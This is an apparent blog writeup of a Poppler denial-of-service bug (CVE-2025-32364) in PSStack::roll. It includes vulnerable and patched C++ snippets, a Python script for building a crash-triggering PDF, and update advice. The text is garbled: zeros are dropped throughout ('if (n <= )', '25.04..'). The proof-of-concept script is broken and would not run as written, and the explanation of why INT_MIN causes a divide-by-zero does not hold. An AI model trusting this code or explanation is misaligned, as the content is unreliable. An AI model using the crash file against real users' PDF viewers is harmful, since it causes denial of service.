CVE-2025-32364 - Exploiting the Poppler Floating-Point Exception in PSStack::roll (Pre-25.04.)

Earlier this year, researchers discovered a new vulnerability in Poppler, the widely used PDF rendering library. Tracked as CVE-2025-32364, this bug results from a floating-point exception in the PSStack::roll function. Applications that rely on Poppler for PDF processing can crash when exposed to specially-crafted, malformed PDFs. In this article, we’ll break down what’s happening, show you how the issue is triggered, and explore its security impact.

What’s Poppler?

Poppler is a popular open-source PDF rendering library used in many Linux applications—including Evince, Okular, and Xpdf. Many scripts and tools rely on Poppler for PDF-to-text and PDF-to-image conversion.

Impact: Crash (Denial of Service)

- Trigger: Handling malformed PDF input that causes an integer divide-by-zero, typically with inputs associated with INT_MIN.

When Poppler parses certain illegitimate PDF objects, the rollover arithmetic inside PSStack::roll can trigger a floating-point exception (typically divide-by-zero), crashing the application.

Here’s a simplified look at the vulnerable function based on Poppler source code before the fix

void PSStack::roll(int n, int k) {
    if (n <= )
        return;
    k = k % n;
    if (k < )
        k += n;
    // ... perform rotation ...
}

When k is INT_MIN and n is a positive integer, k % n can result in a divide-by-zero exception due to C/C++ modulo behavior with negatives and extreme integers.

Step 1: Create a Malformed PDF

Attackers generate a PDF where the embedded PostScript stack commands (possibly via /PS or /Type3 glyphs) supply extremely negative values—like INT_MIN (usually -2147483648 for 32-bit ints).

Step 2: Poppler Handles PDF

When Poppler processes this PDF (e.g., opening with Evince or running pdftocairo), the malicious value is passed to PSStack::roll.

Step 3: Crash

If the input triggers a modulo calculation with k = INT_MIN and n = 1 (or similar), the function encounters a floating-point exception, causing an immediate crash.

Proof-of-concept Exploit

Below is an abbreviated Python script (using PyPDF2 or similar libraries) showing how one might inject malformed data:

from PyPDF2 import PdfWriter

writer = PdfWriter()
page = writer.add_blank_page(72, 72)
# Fictitious low-level PostScript stream with 'roll' and maliciously low k
page_content = b'''
/foo {
    1 -2147483648 roll
} def
foo
'''
page.merge_page({'/Contents': page_content})
with open("exploit.pdf", "wb") as f:
    writer.write(f)

This is a conceptual example; real exploitation would use a crafted PDF with precise PostScript content.

References

- CVE-2025-32364 @ NIST
- Poppler GitLab MR Fix
- Poppler Release Notes 25.04.

# Fix

The Poppler team patched the bug in version 25.04.. The fix ensures proper integer checks and avoids dangerous modulo operations with values like INT_MIN.

Example patched logic

if (n <=  || k == std::numeric_limits<int>::min()) {
    // Avoid crash
    return;
}

Affected versions: Poppler < 25.04..

- Applications affected: Okular, Evince, Xpdf, and any tool or script using Poppler for PDF processing.

Recommendation: Patch and update Poppler immediately. If you cannot update, avoid opening untrusted PDFs or use isolation methods (sandboxing).

Conclusion

CVE-2025-32364 highlights the importance of careful integer and memory handling, especially when parsing complex file formats like PDF. If your system or app uses Poppler, upgrade to v25.04.+ to stay secure.


*This detailed overview is exclusive and written for clarity, focusing on the background, code, and real-world impact of CVE-2025-32364 in Poppler.*

Timeline

Published on: 04/05/2025 22:15:18 UTC
Last modified on: 04/07/2025 14:17:50 UTC